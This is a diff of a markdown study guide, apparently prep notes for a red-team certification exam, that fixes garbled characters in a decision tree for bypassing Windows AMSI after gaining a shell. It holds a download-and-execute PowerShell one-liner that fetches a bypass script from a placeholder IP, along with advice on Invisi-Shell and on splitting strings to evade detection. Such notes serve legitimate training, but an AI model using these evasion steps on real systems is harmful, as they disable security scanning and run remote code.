ErenYeager29/AD-CRTeamer/depth/AMSI.md

 ---

-## SECTION 12 â€” Putting It Together: Your Exam Workflow
+## SECTION 12 — Putting It Together: Your Exam Workflow

 When you land a shell on an exam host and need to run PowerShell tools, this is your decision tree:

 ```
 Get shell on host
-        â†“
+        ↓
 Do I need to run a .NET tool?
-        â”œâ”€ YES â†’ Use execute-assembly via C2 â†’ no AMSI bypass needed for this
+        ├─ YES → Use execute-assembly via C2 → no AMSI bypass needed for this
-        â””â”€ NO, need interactive PowerShell session
+        └─ NO, need interactive PowerShell session
-                    â†“
+                    ↓
             Is Invisi-Shell already staged?
-                    â”œâ”€ YES â†’ Launch through Invisi-Shell (Method 3)
+                    ├─ YES → Launch through Invisi-Shell (Method 3)
-                    â”‚         Covers AMSI + logging in one step
+                    │         Covers AMSI + logging in one step
-                    â””â”€ NO
+                    └─ NO
-                              â†“
+                              ↓
                     Try Method 2 first (one-liner, no extra files):
                     IEX (New-Object Net.WebClient).DownloadString('http://<ip>/bypass2.ps1')
-                              â†“
+                              ↓
                     Test: 'AmsiUtils'
-                              â”œâ”€ Prints cleanly â†’ AMSI bypassed, continue
+                              ├─ Prints cleanly → AMSI bypassed, continue
-                              â””â”€ Still blocked â†’ bypass2.ps1 was caught
+                              └─ Still blocked → bypass2.ps1 was caught
-                                        â†“
+                                        ↓
                                 Run AMSITrigger on bypass2.ps1
-                                Find triggering string â†’ split it â†’ retry
+                                Find triggering string → split it → retry
-                                If still caught â†’ switch to Method 1
+                                If still caught → switch to Method 1
 ```

 **The golden rule**: always test with `'AmsiUtils'` immediately after a bypass attempt.
 If it prints, AMSI is down.
 If it errors, the bypass did not work.
 Do not proceed to loading tools until `'AmsiUtils'` succeeds.